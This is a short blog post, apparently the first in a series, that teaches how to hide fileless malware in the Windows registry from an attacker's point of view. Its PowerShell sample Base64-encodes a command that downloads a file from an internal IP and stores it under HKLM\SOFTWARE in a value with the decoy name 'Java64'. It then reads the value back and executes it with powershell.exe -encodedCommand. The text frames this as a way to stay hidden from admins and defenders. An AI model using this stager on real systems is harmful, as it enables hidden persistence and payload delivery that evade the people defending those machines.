Fileless Malware Storage: Registry – 1 of 4

Malware delivery methods have changed over the years and in some cases, repeated themselves. Within the last couple of years, fileless malware has become prevalent and more widely seen. How this malware is stored on disk varies. Frankly speaking, anywhere that can store data, be it hex or ascii, serves as a great candidate for the case. Over a few series of posts, I’ll highlight a number of methods that can be used for fileless malware.

The first method I’ll address is the registry, which contains a wealth of data and is prime for the cause. Largely speaking, it is highly unlikely that an admin or defender would know every key or value in the registry. Due to that fact, we have a good chance of being able to stage our malware there without human detection. If the target is monitoring for the generation of registry keys or values, this tactic becomes much more difficult, however, not impossible. Below is an example of this tactic being utilized through PowerShell.

# Registry Stager Store
$command = 'Start-BitsTransfer -Source "http://10.1.1.1/Kittens _ Catster_files\feral-cat-day.jpg" -Destination "C:\cat2.jpg"'
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encodedCommand = [Convert]::ToBase64String($bytes)
$EncodedCommand
New-ItemProperty HKLM:\software -Name "Java64" -Value $encodedCommand -PropertyType multistring


# Registry Stager Retrieval
$cmd = Get-ItemPropertyValue HKLM:\SOFTWARE -Name "Java64"
powershell.exe -encodedCommand $cmd